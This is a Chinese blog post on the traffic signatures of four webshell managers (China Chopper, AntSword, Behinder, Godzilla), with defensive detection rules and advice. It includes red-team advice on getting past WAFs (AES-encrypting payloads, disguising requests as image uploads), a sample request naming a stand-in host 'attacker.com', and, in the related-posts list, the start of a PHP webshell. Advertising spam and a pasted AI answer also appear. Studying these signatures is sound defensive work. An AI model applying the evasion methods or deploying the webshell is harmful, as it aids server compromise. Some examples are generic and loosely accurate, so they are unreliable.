Webshell管理工具 [流量分析总结文档 蚁剑、冰蝎、菜刀、哥斯拉]

最新推荐文章于 2025-06-16 17:02:47 发布
最新推荐文章于 2025-06-16 17:02:47 发布
阅读量933 收藏 12
点赞数 18
CC 4.0 BY-SA版权
文章标签: web安全 黑客技术 网络安全 渗透测试 WebShell 计算机 流量分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41314882/article/details/147333207

文章目录

引言
  • WebShell是一种通过Web界面实现目标服务器远程控制的工具,因其隐蔽性和强大功能,成为网络攻击与渗透测试中的核心利器。当前,菜刀(China Chopper)、蚁剑(AntSword)、冰蝎__**(Behinder)和哥斯拉(Godzilla)**是最主流的WebShell管理工具。
  • 本文从红队视角出发,分析这些工具的最新特性、流量特征及绕过WAF(Web应用防火墙)的魔改方案,同时为蓝队提供防御对策,帮助安全从业者全面掌握WebShell的应用与应对策略。
主流WebShell管理工具概览

以下是当前渗透测试与攻击场景中最常用的四款WebShell管理工具:

  • 菜刀(China Chopper):以简洁高效著称,体积小,易于隐藏。

  • 蚁剑(AntSword):开源工具,功能丰富,支持插件扩展。

  • 冰蝎(Behinder):隐蔽性强,采用动态加密技术。

  • 哥斯拉(Godzilla):支持多协议,适应复杂网络环境。

这些工具因其独特优势,在不同攻击场景中各具特色。

最新版本特性深度解析

以下是对四款工具最新版本的特性分析,涵盖协议支持、功能模块及攻击性:

菜刀(China Chopper)

  • 协议支持:HTTP/HTTPS

  • 功能模块

    • 文件管理:上传、下载、编辑文件

    • 命令执行:运行系统命令

    • 数据库管理:连接并操作数据库

  • 攻击性:仅几KB的体积,便于快速部署和隐藏。

蚁剑(AntSword)

  • 协议支持:HTTP/HTTPS

  • 功能模块

    • 文件管理:浏览、上传、删除文件

    • 命令执行:运行系统命令

    • 虚拟终端:模拟终端操作

    • 插件系统:支持自定义扩展

    • 数据库管理:支持MySQL、SQL Server等

  • 攻击性:开源特性便于定制,支持多种编码混淆。

冰蝎(Behinder)

  • 协议支持:HTTP/HTTPS,自定义加密协议

  • 功能模块

    • 文件管理:上传、修改、删除文件

    • 命令执行:执行系统命令

    • Shell反弹:反向连接攻击者主机

    • 流量加密:动态二进制加密

  • 攻击性:加密通信,规避传统检测,支持Java类加载。

哥斯拉(Godzilla)

  • 协议支持:HTTP/HTTPS、SOCKS5

  • 功能模块

    • 文件管理:文件操作与管理

    • 命令执行:运行命令

    • 代理功能:支持SOCKS5代理

    • Shell反弹:反向连接

  • 攻击性:多协议支持,payload多样化。

小结:菜刀简洁高效,蚁剑功能全面,冰蝎隐蔽性强,哥斯拉协议灵活。这些特性决定了其流量特征与绕过能力。

流量特征分析与快速识别

流量特征是检测WebShell的关键。以下从红队视角分析四款工具的流量特征,并提供识别方法。

菜刀(China Chopper)

  • 流量特征

    • HTTP POST请求

    • payload包含evalexec或base64编码

    • 响应为命令输出

  • 示例

    POST /cmd.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
cmd=echo%20"test"

    响应"test"

  • 识别方法:监控POST请求中的敏感关键字或base64编码。

蚁剑(AntSword)

  • 流量特征

    • HTTP POST请求

    • payload混淆/加密,常见参数如z1=base64_encoded_payload

    • 响应为文件列表或命令输出

  • 示例

    POST /antSword/exec.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
z1=base64_encoded_payload

    响应:文件目录列表

  • 识别方法:分析异常POST请求,关注特征参数(如z1)。

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

冰蝎(Behinder)

  • 流量特征

    • HTTP POST请求

    • 自定义加密协议,高频小包交互

    • payload无明显特征

  • 示例

    POST /beetle/command.php HTTP/1.1
Host: target.com
Content-Type: application/octet-stream
[encrypted_payload]

    响应:加密数据

  • 识别方法:使用DPI分析加密流量,关注高频小包。

哥斯拉(Godzilla)

  • 流量特征

    • HTTP POST请求

    • payload混淆,包含特定标识符(如cmd=connect

    • 可能涉及SOCKS5流量

  • 示例

    POST /goProxy/command HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
cmd=connect&target=attacker.com

    响应:连接状态

  • 识别方法:监控特定参数和SOCKS5流量。

逻辑分析:WebShell流量通常表现为高频请求、敏感操作和异常响应内容,结合请求频率与协议特征可快速判断类型。

魔改方案:绕过WAF监控

WAF通过规则匹配检测恶意流量,红队可通过以下方案提升隐蔽性:

  1. 加密与混淆:对payload进行AES加密后base64编码。

  2. 流量伪装:模拟正常业务流量,添加Referer等标准HTTP头。

  3. 分段传输:将payload拆分为多个小包发送。

  4. 使用HTTPS:加密通信,隐藏payload。

  5. 自定义协议:开发私有协议,避开WAF规则。

示例

POST /upload.php HTTP/1.1
Host: target.com
Referer: https://target.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
[encrypted_payload]

案例:魔改菜刀,将POST请求伪装为图片上传,payload经AES加密后通过HTTPS传输,成功绕过某商业WAF。

防御对策与实际方案
流量分析工具

  • Wireshark:捕获HTTP/HTTPS流量,分析POST请求。

  • Suricata:编写规则检测异常流量。

    alert http $EXTERNAL\_NET any -> $HOME\_NET any (msg:"China Chopper Detected"; flow:to\_server; content:"eval"; http\_uri; sid:1000001;)

  • Zeek:生成流量日志,分析高频请求模式。

行为检测
  • 使用机器学习模型识别命令执行模式。
深度包检测(DPI)
  • 部署DPI设备,解密HTTPS流量,分析payload。
防御建议

  • 监控Web服务器日志,查找异常路径(如/exec.php)。

  • 限制文件上传功能,禁用危险函数(如evalsystem)。

  • 更新WAF规则,检测加密流量和高频小包。

WebShell管理工具特性与区别表格
特性菜刀蚁剑冰蝎哥斯拉
支持协议HTTP/HTTPSHTTP/HTTPSHTTP/HTTPS,自定义加密协议HTTP/HTTPS、SOCKS5
支持语言PHP、ASP、JSPPHP、ASP、JSPJava、PHPPHP、ASP
主要功能文件管理、命令执行、数据库操作文件管理、命令执行、虚拟终端、插件文件管理、命令执行、Shell反弹、加密文件管理、命令执行、代理、Shell反弹
流量特征POST请求,payload明显POST请求,payload混淆POST请求,payload加密POST请求,payload混淆,SOCKS5
隐蔽性
绕过WAF
社区支持
总结

本文全面剖析了菜刀、蚁剑、冰蝎和哥斯拉四款WebShell管理工具,从特性、流量特征到魔改方案,为红队提供了绕过WAF的实用策略,同时为蓝队设计了针对性的防御措施。

关键点如下

  • 特性差异:菜刀简洁、蚁剑灵活、冰蝎隐蔽、哥斯拉多能。

  • 流量识别:通过高频POST请求、敏感payload和异常响应快速定位。

  • 攻防博弈:红队可利用加密与伪装提升隐蔽性,蓝队需结合流量分析与行为检测加强防御。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

【愚公系列】2023年06月 网络安全高级班 025.HW护网行动攻防演练介绍和工具
时光隧道
05-12 1万+
HW护网行动攻防演练是一种针对网络安全的实践活动,用于测试和提高组织的网络安全防御和攻击能力。通过模拟真实的网络攻击和防御行动,演练参与者在紧张压力下的反应和解决问题的能力,发现网络安全漏洞和提高安全意识,加强网络安全防御能力。攻防演练的成员组成一般包括攻击者、防御者和观察者三个角色。攻击者的任务是模拟真实的黑客攻击,找出系统的漏洞并利用其进行攻击,以检验系统的安全性。防御者则负责发现和修补漏洞,并保护系统不受攻击。观察者则负责记录和分析整个攻防过程,并提供建议和改进意见。
webshell的视角谈攻防对抗
si1ence的博客
12-05 914
0x0 背景 由于参加最近特殊多人活动的原因,很多渗透攻击武器也进行了对应的更新。冰蝎出了3.0版本、甚至还有好几个beta版本;还朋友圈还出了一个据说比冰蝎3.0还厉害的神器”哥斯拉”全部类型的shell均过市面所有静态查杀、流量加密过市面全部流量waf、自带的插件是冰蝎不能比拟的;看名字就很厉害的样子,看描述更是功能强大 不禁内心一阵酸爽。 丰富了自己部分武器库之后很多白帽子喜悦之情溢于言表,身边很多小伙伴甚至都开始在本地开始测试了;几家欢喜几家愁,总一些人的快乐终究是建立在一些人的痛苦之上
webshell连接工具冰蝎检测特征提取
TKMoma
09-09 9385
1⃣️、概述         冰蝎作为新款的webshell连接工具,使用效果非常好。本文主要从冰蝎使用过程产生的流量里提取检测特征。部分提取思路从基于流量侧检测冰蝎webshell交互通讯获得了启发。后经过测试发现了关于冰蝎工具的通用检测特征(针对目前已公开的版本)。下面详细介绍本文内容。 2⃣️、各版本对比 &nb...
Webshell篇&魔改哥斯拉&打乱特征指纹&新增后门混淆&过云查杀&过流量识别
最新发布
2302_80396242的博客
06-16 408
某X60全家桶下的Web环境,Webshell植入后的渗透测试对抗情况。、webshell工具里面的后门代码不被杀毒检测到-混淆。、webshell工具里面的功能操作不被杀毒拦截到-魔改。、webshell工具里面的操作连接不被平台捕获到-魔改。解决1:绕过识别(魔改打乱特征,新增加密算法)解决2:绕过查杀(魔改打乱特征,新增加密算法)设置项目SDK,添加依赖,添加工件主类。魔改哥斯拉-JAR反编译打包构建。魔改哥斯拉-防识别-打乱特征指纹。魔改哥斯拉-防查杀-新增后门插件。、已知数据的提交内容加密算法。
webshell工具-冰蝎流量特征和加密方式
qq_40898302的博客
05-25 2402
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2774
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
WebShell流量特征检测_冰蝎
徐徐徐的博客
09-06 1577
冰蝎为了实现可以在webshell内添加任意内容 (比如gif89a子类的文件头或者其它标示字符) 冰蝎在初始化密钥时会对webshell进行两次访问,然后比较两次页面返回的差异,把两次请求都相同的字符记录一个位置,后续加密会用到这两个位置(beginIndex,endIndex)冰蝎通讯默认使用长连接,避免了频繁的握手造成的资源开销。冰蝎默认 Accept 字段的值很特殊,这个特征存在于冰蝎的任何一个通讯阶段。②密钥使用的是连接密码的MD5值的前16位,并存储于Session中。
生产实习--启明星辰 第四天(Web网络安全基础知识,sql注入,xss攻击,csrf与ssrf,xxe攻击,未授权漏洞,漏洞,常见中间件攻击,文件包含,流量特征
TuYHAAAAAA的博客
07-09 1586
CSRF漏洞攻击原理:客户端请求伪造,在我看来,假如我是黑客,我想访问网站A,但是这个网站A要付费,我没钱呀,我就找到一个人他要访问两个网站分别是A网站和B网站,我就黑了网站B,在他同时访问这两个网站时,我就偷偷发送一个有危害的请求,来获取A网站的cookie从而用他的账号密码来访问这个A网站。SSRF跨站请求伪造:服务端请求伪造,在我看来,就是操作服务器骗取客户端数据信息。外部实体注入,是一种利用XML解析器处理XML文档时的安全漏洞进行的攻击。
网络安全工程师面试题整理
m0_67393686的博客
07-30 7686
网络发现和安全审计工具主机发现端口扫描应用程序和版本探测操作系统探测-p指定端口扫描-sTtcp扫描-sPping扫描-Pn不进行ping扫描-o操作系统探测。
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3596
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
渗透测试-菜刀冰蝎哥斯拉webshell工具及特征分析
wangluoanquan111的博客
03-17 1306
在测试过程中,我们经常会运到各种webshell管理工具,这里我介绍几种常见的webshell工具给大家。webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。?
冰歇webshell初探
qq_69775412的博客
04-22 5676
木马样本: <?php class C{ public function __invoke($p) { eval($p.""); } }; session_start(); isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSIO
流量特征分析——菜刀冰蝎哥斯拉
热门推荐
Sgirll的博客
07-22 1万+
通过对这三种常见的网络攻击工具流量特征的分析,我们可以更好地了解它们在网络流量中的表现。同时,持续的学习和了解新兴攻击工具的流量特征也是保持网络安全的重要一环。哥斯拉的数据包中包含了特定的标记,如"XORHEAD"和"XORBODY",用于标识该数据包是哥斯拉的控制命令。此外,哥斯拉还使用了一种自定义的二进制协议,在通信中传输各种类型的数据。本文将重点研究菜刀冰蝎这三种常见的网络攻击工具,分析它们在流量中留下的痕迹和特征,以便网络管理员和安全专家能够更好地识别和对抗这些工具所带来的潜在威胁。
冰蝎哥斯拉流量特征
qq_53218512的博客
06-11 5421
webshell管理工具冰蝎哥斯拉流量特征
Web安全-Godzilla(哥斯拉Webshell管理工具使用
Boom!脑洞大爆炸的博客
07-03 7298
Web安全-Godzilla(哥斯拉Webshell管理工具使用
webshell工具流量特征
qq_52973916的博客
08-11 493
这段代码基本是所有WebShell客户端链接PHP类WebShell都有的一种代码,但是有的客户端会将这段编码或者加密,而是明文,所以较好发现,同时也有eval这种明显的特征。冰蝎webshell建立连接的同时,javaw也与目的主机建立tcp连接,每次连接使用本地端口在49700左右,每连接一次,每建立一次新的连接,端口就依次增加。由于中包含了很多加密、绕过插件,所以导致很多流量被加密后无法识别,但是混淆加密后还有一个比较明显的特征,即为参数名大多以。冰蝎中,任何请求,最终都会调用。
web安全第四天:webshell原理与菜刀使用
cc777777777的博客
02-26 2215
webshell原理与菜刀使用
冰蝎哥斯拉流量特征
04-23
<think>嗯,用户想了解冰蝎哥斯拉这些WebShell工具的流量特征,可能用于安全分析或检测规则制定。首先,我需要回忆一下之前学过的相关知识,并结合提供的引用内容来整理答案。 首先,用户提到的三个工具:冰蝎哥斯拉,每个工具的网络流量特征可能不同。根据引用内容,引用[3]提到Webshell工具的流量特征分析,其中提到在默认编码连接时流量有可读性,而使用base64编码时会加密载荷。冰蝎流量特征主要是TLS加密和固定请求头,而哥斯拉则使用AES加密和自定义User-Agent,如Shiro等。 接下来,我需要分别整理每个工具的静态和动态特征。比如,的流量在默认情况下可能包含特定的参数名,如“ant”或“antsword”,这在引用[3]中有提到。此外,的流量中可能会有base64编码的痕迹,尤其是当用户选择base64编码器时,载荷会被多层编码,这可能作为检测点。 对于冰蝎,引用[2]和引用[3]都提到冰蝎2.0和3.0的动态特征。冰蝎2.0的HTTP请求中有固定的Content-Type,如application/octet-stream,而冰蝎3.0则使用更复杂的加密,每次请求会携带不同的Cookie值。同时,冰蝎的流量通常经过TLS加密,所以检测需要关注HTTP头部特征,如User-Agent或Content-Type。 哥斯拉方面,引用[2]指出哥斯拉使用AES加密,生成的payload有默认密码和密钥。此外,哥斯拉的User-Agent可能包含Shiro框架的特征,如“java/1.8”等。在流量中,哥斯拉的请求参数名可能为“pass”,响应内容则是加密后的二进制数据,这需要解密才能识别。 用户可能需要将这些特征用于安全检测规则的制定,所以需要具体指出每个工具的特征点,如HTTP头部的特定字段、加密方式、参数名称等。同时,用户可能关心如何区分这些工具,因此需要对比它们的异同,比如冰蝎哥斯拉都使用加密,但加密方式和头部特征不同。 另外,引用中提到的哥斯拉支持内存shell和自定义HTTP头,这可能影响检测方法,比如检查异常的User-Agent或Cookie长度。冰蝎的Cookie在3.0版本每次请求都会变化,这可能作为行为分析的依据。 需要确保回答结构清晰,分点说明每个工具的特征,并给出检测建议。可能还需要提醒用户结合静态和动态特征,以及流量解密和日志分析,来增强检测能力。最后,生成相关问题时,可以围绕检测方法、加密流量识别、工具更新带来的特征变化等方面提问。</think>### 冰蝎哥斯拉WebShell流量特征分析 #### 一、(AntSword) 1. **流量特征** - **默认编码连接**:HTTP请求参数名可能包含`ant`或`antsword`,载荷明文传输,例如:`data=@eval(base64_decode($_POST[z0]))`[^3]。 - **Base64编码模式**:请求参数值会经过多层Base64编码,如`z0=JG...`(原始载荷编码后),响应内容也通过Base64返回[^3]。 - **User-Agent**:默认包含`AntSword`标识,但可通过插件修改。 2. **检测建议** - 检查HTTP请求中是否存在`antsword`相关参数名。 - 分析Base64编码后的载荷是否包含PHP函数(如`eval`、`assert`)。 --- #### 二、冰蝎(Behinder) 1. **冰蝎2.0** - **静态特征**: - 请求头中`Content-Type`固定为`application/octet-stream`[^3]。 - 载荷使用AES加密,密钥硬编码在WebShell文件中(如`e45e329feb5d925b`)[^2]。 - **动态特征**: - 首次连接会发送`20`字节的随机密钥协商数据包。 - 后续请求Cookie值固定,如`PHPSESSID=xxx`[^3]。 2. **冰蝎3.0** - **改进特征**: - Cookie值每次请求动态变化,长度固定为16字节。 - 支持TLS加密流量,User-Agent伪装为浏览器(如`Mozilla/5.0`)[^2]。 3. **检测建议** - 识别固定`Content-Type`与异常Cookie长度。 - 分析加密流量是否包含AES加密模式(如CBC模式)。 --- #### 三、哥斯拉(Godzilla) 1. **流量特征** - **加密方式**:默认使用AES加密,密钥动态生成,部分版本存在默认密码(如`pass`)。 - **HTTP头部**: - User-Agent可能包含`Shiro`框架标识(如`java/1.8`)。 - 请求参数名通常为`pass`,响应内容为加密二进制数据[^3]。 - **协议特征**: - JSP型WebShell会调用`ClassLoader`等Java反射机制。 - PHP型WebShell流量中可能包含`xc`、`pass`等关键字[^3]。 2. **检测建议** - 检测异常User-Agent(如`Shiro`相关)。 - 监控Java反射调用或PHP的`eval`函数特征。 --- #### 四、通用检测策略 1. **静态分析**:检查WebShell文件中的硬编码密钥或特定函数(如`ClassLoader`)。 2. **动态流量分析**: - 识别固定参数名(如`ant`、`pass`)。 - 分析加密载荷的熵值,判断是否为AES/Base64编码。 3. **行为检测**:关注异常HTTP请求频率或非常规端口通信。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值